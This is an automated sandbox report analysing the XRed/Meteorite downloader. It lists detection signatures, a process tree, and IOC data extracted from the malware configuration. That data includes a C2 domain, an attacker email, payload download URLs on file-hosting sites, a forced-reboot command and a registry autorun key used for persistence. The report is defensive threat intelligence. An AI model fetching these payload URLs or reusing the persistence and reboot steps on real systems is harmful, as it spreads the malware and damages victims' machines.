Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1583469
MD5:06303600a3a44eb2fbce248eb0fe9fc1
SHA1:ccfb720a50808469da5d67eea306d08f51e11538
SHA256:db69f19879e131fd35e882606148335c6dcb26cbea650d394ba519d76c57bb85
Tags:exeuser-jstrosch
Infos:

Detection

XRed
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to implement multi-threaded time evasion
Contains functionality to inject threads in other processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Uses dynamic DNS services
Uses shutdown.exe to shutdown or reboot the system
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the program root directory (C:\Program Files)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Shutdown
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2828 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 06303600A3A44EB2FBCE248EB0FE9FC1)
    • 1.exe (PID: 1344 cmdline: "C:\Program Files (x86)\1.exe" 0 MD5: D026CFE00B08DA14B0A8B7F8860887D7)
      • ._cache_1.exe (PID: 3236 cmdline: "C:\Users\user\Desktop\._cache_1.exe" 0 MD5: AED710082D6986C6DCEED09D3A5EDCC6)
      • Synaptics.exe (PID: 5236 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 00367A9FAA8069389A97267D772563E8)
    • 2.exe (PID: 980 cmdline: "C:\Program Files (x86)\2.exe" 0 MD5: 85A57509DB3E9DFA7B4E451B8243220D)
      • ._cache_2.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\._cache_2.exe" 0 MD5: B7176450AEBB9572B34E875984456AC1)
    • 3.exe (PID: 7288 cmdline: "C:\Program Files (x86)\3.exe" 0 MD5: 1EDB88F9EE745EAAEE2CBD8219318EB0)
    • 4.exe (PID: 7320 cmdline: "C:\Program Files (x86)\4.exe" 0 MD5: 39E7BE73C7531AC895F75834FDC1BCD6)
    • wic.exe (PID: 7568 cmdline: "C:\Windows\wic.exe" 0 MD5: 6AD65B03E75BC5509BA3104510178EE6)
      • cmd.exe (PID: 7732 cmdline: C:\Windows\system32\cmd.exe /c "shutdown /r /t 0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • shutdown.exe (PID: 7792 cmdline: shutdown /r /t 0 MD5: FCDE5AF99B82AE6137FB90C7571D40C3)
  • EXCEL.EXE (PID: 5296 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 7812 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • cbas.exe (PID: 8072 cmdline: "C:\Windows\cbas.exe" MD5: 9FD7C0ACC95C7F1311BDE279D0B6A03A)
  • cleanup

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
file.exeMALWARE_Win_MeteoriteDetects Meteorite downloaderditekSHen
  • 0x17b4:$x2: Meteorite Downloader

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XRedYara detected XRedJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\RCXF376.tmpJoeSecurity_XRedYara detected XRedJoe Security
      C:\Users\user\AppData\Local\Temp\RCXF376.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        C:\Users\user\AppData\Local\Temp\RCXF376.tmpMALWARE_Win_MeteoriteDetects Meteorite downloaderditekSHen
        • 0xb4dc8:$x2: Meteorite Downloader
        C:\Program Files (x86)\1.exeJoeSecurity_XRedYara detected XRedJoe Security
          C:\Program Files (x86)\1.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            Click to see the 17 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000000.00000003.1747294140.0000000000780000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              00000003.00000003.1718137982.00000000020C4000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_MeteoriteDetects Meteorite downloaderditekSHen
              • 0x17b4:$x2: Meteorite Downloader
              00000001.00000000.1709599751.0000000000401000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                00000001.00000000.1709599751.0000000000401000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                  Process Memory Space: 1.exe PID: 1344JoeSecurity_XRedYara detected XRedJoe Security
                    Click to see the 1 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    3.3.Synaptics.exe.20c4000.0.raw.unpackMALWARE_Win_MeteoriteDetects Meteorite downloaderditekSHen
                    • 0x17b4:$x2: Meteorite Downloader
                    0.0.file.exe.400000.0.unpackMALWARE_Win_MeteoriteDetects Meteorite downloaderditekSHen
                    • 0x73b4:$x2: Meteorite Downloader
                    3.3.Synaptics.exe.20c4000.0.unpackMALWARE_Win_MeteoriteDetects Meteorite downloaderditekSHen
                    • 0x17b4:$x2: Meteorite Downloader
                    0.3.file.exe.764011.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                      0.2.file.exe.400000.0.unpackMALWARE_Win_MeteoriteDetects Meteorite downloaderditekSHen
                      • 0x10a8:$x1: MeteoriteDownloader
                      • 0x11b7:$x1: MeteoriteDownloader
                      • 0x1600:$x1: MeteoriteDownloader
                      • 0x11a1:$x2: Meteorite Downloader
                      • 0x1618:$x2: Meteorite Downloader
                      • 0x73b4:$x2: Meteorite Downloader
                      • 0x1618:$x3: Meteorite Downloader v
                      • 0x1b08:$s1: regwrite
                      • 0x1654:$s2: urlmon
                      • 0x1a80:$s3: wscript.shell
                      • 0x15f8:$s4: modMain
                      • 0x19dc:$s5: VBA6.DLL
                      Click to see the 3 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c "shutdown /r /t 0", CommandLine: C:\Windows\system32\cmd.exe /c "shutdown /r /t 0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\wic.exe" 0, ParentImage: C:\Windows\wic.exe, ParentProcessId: 7568, ParentProcessName: wic.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "shutdown /r /t 0", ProcessId: 7732, ProcessName: cmd.exe
                      Sigma detected: Invoke-Obfuscation VAR+ Launcher
                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c "shutdown /r /t 0", CommandLine: C:\Windows\system32\cmd.exe /c "shutdown /r /t 0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\wic.exe" 0, ParentImage: C:\Windows\wic.exe, ParentProcessId: 7568, ParentProcessName: wic.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "shutdown /r /t 0", ProcessId: 7732, ProcessName: cmd.exe
                      Sigma detected: Startup Folder File Write
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Program Files (x86)\4.exe, ProcessId: 7320, TargetFilename: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
                      Sigma detected: Suspicious Execution of Shutdown
                      Source: Process startedAuthor: frack113: Data: Command: shutdown /r /t 0, CommandLine: shutdown /r /t 0, CommandLine|base64offset|contains: v', Image: C:\Windows\SysWOW64\shutdown.exe, NewProcessName: C:\Windows\SysWOW64\shutdown.exe, OriginalFileName: C:\Windows\SysWOW64\shutdown.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "shutdown /r /t 0", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7732, ParentProcessName: cmd.exe, ProcessCommandLine: shutdown /r /t 0, ProcessId: 7792, ProcessName: shutdown.exe
                      Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\1.exe, ProcessId: 1344, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                      Sigma detected: Office Macro File Creation
                      Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 5236, TargetFilename: C:\Users\user\AppData\Local\Temp\SiyGYB3T.xlsm

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-02T20:34:49.438746+010020212451A Network Trojan was detected192.168.2.44973047.254.187.7280TCP
                      2025-01-02T20:34:50.703531+010020212451A Network Trojan was detected192.168.2.44973047.254.187.7280TCP
                      2025-01-02T20:34:54.702088+010020212451A Network Trojan was detected192.168.2.44973047.254.187.7280TCP
                      2025-01-02T20:34:55.222987+010020212451A Network Trojan was detected192.168.2.44973047.254.187.7280TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-02T20:34:49.438746+010020225501A Network Trojan was detected192.168.2.44973047.254.187.7280TCP
                      2025-01-02T20:34:50.703531+010020225501A Network Trojan was detected192.168.2.44973047.254.187.7280TCP
                      2025-01-02T20:34:54.702088+010020225501A Network Trojan was detected192.168.2.44973047.254.187.7280TCP
                      2025-01-02T20:34:55.222987+010020225501A Network Trojan was detected192.168.2.44973047.254.187.7280TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-02T20:34:49.438746+010020185811A Network Trojan was detected192.168.2.44973047.254.187.7280TCP
                      2025-01-02T20:34:50.703531+010020185811A Network Trojan was detected192.168.2.44973047.254.187.7280TCP
                      2025-01-02T20:34:54.702088+010020185811A Network Trojan was detected192.168.2.44973047.254.187.7280TCP
                      2025-01-02T20:34:55.222987+010020185811A Network Trojan was detected192.168.2.44973047.254.187.7280TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-02T20:35:58.898119+010020448871A Network Trojan was detected192.168.2.449845142.250.186.142443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-02T20:34:56.526033+010020197142Potentially Bad Traffic192.168.2.44973047.254.187.7280TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-02T20:36:02.093228+010028007811Attempted User Privilege Gain47.254.187.7280192.168.2.449740TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-02T20:34:50.154331+010028000291Attempted User Privilege Gain47.254.187.7280192.168.2.449730TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-02T20:35:00.259871+010028032742Potentially Bad Traffic192.168.2.44974047.254.187.7280TCP
                      2025-01-02T20:35:01.530652+010028032742Potentially Bad Traffic192.168.2.44974047.254.187.7280TCP
                      2025-01-02T20:35:02.093483+010028032742Potentially Bad Traffic192.168.2.44974047.254.187.7280TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-02T20:34:59.703337+010028326171Malware Command and Control Activity Detected192.168.2.44973869.42.215.25280TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: file.exeAvira: detected
                      Antivirus detection for URL or domain
                      Source: http://xred.site50.net/syn/Synaptics.rarZAvira URL Cloud: Label: malware
                      Source: http://xred.site50.net/syn/SUpdate.iniZAvira URL Cloud: Label: malware
                      Source: http://xred.site50.net/syn/SSLLibrary.dll6Avira URL Cloud: Label: malware
                      Source: http://xred.site50.net/syn/SSLLibrary.dlhAvira URL Cloud: Label: malware
                      Antivirus detection for dropped file
                      Source: C:\Program Files (x86)\2.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                      Source: C:\Program Files (x86)\2.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                      Source: C:\Users\user\AppData\Local\Temp\RCXF308.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                      Source: C:\Users\user\AppData\Local\Temp\RCXF308.tmpAvira: detection malicious, Label: TR/VB.Downloader.Gen
                      Source: C:\Users\user\AppData\Local\Temp\RCXF308.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\3[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\1[1].exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\1[1].exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                      Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                      Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                      Source: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bykcxw.exeAvira: detection malicious, Label: HEUR/AGEN.1315939
                      Source: C:\Program Files (x86)\1.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                      Source: C:\Program Files (x86)\1.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                      Source: C:\Program Files (x86)\3.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                      Source: C:\Users\user\AppData\Local\Temp\HjsFu2ta.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                      Source: C:\Users\user\AppData\Local\Temp\HjsFu2ta.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                      Source: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\clxa.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                      Source: C:\Users\user\Documents\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                      Source: C:\Users\user\Documents\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                      Source: C:\Windows\cbas.exeAvira: detection malicious, Label: HEUR/AGEN.1317762
                      Source: C:\Users\user\AppData\Local\Temp\RCXF376.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                      Source: C:\Users\user\AppData\Local\Temp\RCXF376.tmpAvira: detection malicious, Label: TR/VB.Downloader.Gen
                      Source: C:\Users\user\AppData\Local\Temp\RCXF376.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                      Source: C:\ProgramData\Synaptics\RCXF181.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                      Source: C:\ProgramData\Synaptics\RCXF181.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\2[1].exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\2[1].exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cbas[1].exeAvira: detection malicious, Label: HEUR/AGEN.1317762
                      Found malware configuration
                      Source: 1.0.1.exe.400000.0.unpackMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Program Files (x86)\1.exeReversingLabs: Detection: 100%
                      Source: C:\Program Files (x86)\2.exeReversingLabs: Detection: 89%
                      Source: C:\Program Files (x86)\3.exeReversingLabs: Detection: 86%
                      Source: C:\Program Files (x86)\4.exeReversingLabs: Detection: 68%
                      Source: C:\ProgramData\Synaptics\RCXF181.tmpReversingLabs: Detection: 100%
                      Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 100%
                      Source: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bykcxw.exeReversingLabs: Detection: 91%
                      Source: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cghqi.exeReversingLabs: Detection: 71%
                      Source: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\clxa.exeReversingLabs: Detection: 86%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\1[1].exeReversingLabs: Detection: 100%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\wic[1].exeReversingLabs: Detection: 39%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\3[1].exeReversingLabs: Detection: 86%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\4[1].exeReversingLabs: Detection: 68%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\2[1].exeReversingLabs: Detection: 89%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cbas[1].exeReversingLabs: Detection: 47%
                      Source: C:\Users\user\AppData\Local\Temp\HjsFu2ta.exeReversingLabs: Detection: 100%
                      Source: C:\Users\user\AppData\Local\Temp\RCXF376.tmpReversingLabs: Detection: 92%
                      Source: C:\Users\user\Desktop\._cache_1.exeReversingLabs: Detection: 21%
                      Source: C:\Users\user\Documents\~$cache1ReversingLabs: Detection: 100%
                      Source: C:\Windows\cbas.exeReversingLabs: Detection: 47%
                      Source: C:\Windows\wic.exeReversingLabs: Detection: 39%
                      Multi AV Scanner detection for submitted file
                      Source: file.exeReversingLabs: Detection: 86%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 91.1% probability
                      Machine Learning detection for dropped file
                      Source: C:\Program Files (x86)\2.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\RCXF308.tmpJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\3[1].exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\1[1].exeJoe Sandbox ML: detected
                      Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                      Source: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bykcxw.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\1.exeJoe Sandbox ML: detected
                      Source: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cghqi.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\3.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\HjsFu2ta.exeJoe Sandbox ML: detected
                      Source: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\clxa.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Documents\~$cache1Joe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\4[1].exeJoe Sandbox ML: detected
                      Source: C:\Windows\cbas.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\RCXF376.tmpJoe Sandbox ML: detected
                      Source: C:\ProgramData\Synaptics\RCXF181.tmpJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\2[1].exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\4.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cbas[1].exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: file.exeJoe Sandbox ML: detected
                      Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\._cache_2.exeWindow detected: (&D)C:\ProgramData\Synaptics\Synaptics.exeC:\ProgramData\Synaptics\Synaptics.exe(&W)... (END USER LICENSE AGREEMENT EULA) [] []
                      Source: C:\Users\user\Desktop\._cache_2.exeWindow detected: 1993-2023 Alexander Roshal(&D)C:\ProgramData\Synaptics\Synaptics.exeC:\ProgramData\Synaptics\Synaptics.exe(&W)... (END USER LICENSE AGREEMENT EULA) [] []
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49845 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49852 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49861 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49876 version: TLS 1.2
                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 4.exe, 00000009.00000000.1765436856.0000000000D54000.00000002.00000001.01000000.00000010.sdmp, 4.exe, 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmp, 4.exe, 00000009.00000003.1770403788.000000000589A000.00000004.00000020.00020000.00000000.sdmp, 4.exe, 00000009.00000003.1769414165.000000000574D000.00000004.00000020.00020000.00000000.sdmp, 4[1].exe.0.dr
                      Source: Binary string: \read_name_pass_dll\release\read_name_pass_dll.pdb source: wic.exe, 0000000B.00000003.1823633936.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, msslac[1].dll.11.dr
                      Source: Binary string: \Release\EXEPayload.pdb! source: wic.exe, 0000000B.00000003.1814987251.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, cbas.exe, 00000012.00000002.3537228980.0000000000BD3000.00000002.00000001.01000000.0000001A.sdmp, cbas.exe, 00000012.00000000.1920081415.0000000000BD3000.00000002.00000001.01000000.0000001A.sdmp, cbas.exe.11.dr
                      Source: Binary string: \Release\EXEPayload.pdb source: wic.exe, 0000000B.00000003.1814987251.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, cbas.exe, 00000012.00000002.3537228980.0000000000BD3000.00000002.00000001.01000000.0000001A.sdmp, cbas.exe, 00000012.00000000.1920081415.0000000000BD3000.00000002.00000001.01000000.0000001A.sdmp, cbas.exe.11.dr
                      Source: Binary string: \Release\DownLoad.pdb source: wic.exe, 0000000B.00000000.1799136325.0000000001003000.00000002.00000001.01000000.00000018.sdmp, wic.exe, 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmp, wic.exe.0.dr, wic[1].exe.0.dr
                      Source: Binary string: D:\Projects\WinRAR\sfx\setup\build\sfxrar32\Release\sfxrar.pdb source: ._cache_2.exe, 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmp, ._cache_2.exe, 00000008.00000000.1762473821.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmp, 2.exe.0.dr, ._cache_2.exe.5.dr, 2[1].exe.0.dr
                      Source: Binary string: D:\Projects\WinRAR\sfx\setup\build\sfxrar32\Release\sfxrar.pdb< source: ._cache_2.exe, 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmp, ._cache_2.exe, 00000008.00000000.1762473821.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmp, 2.exe.0.dr, ._cache_2.exe.5.dr, 2[1].exe.0.dr
                      Source: 1.exe, 00000001.00000000.1709599751.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                      Source: 1.exe, 00000001.00000000.1709599751.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                      Source: 1.exe, 00000001.00000000.1709599751.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: autorun.inf
                      Source: Synaptics.exe, 00000003.00000003.1717667109.0000000000763000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
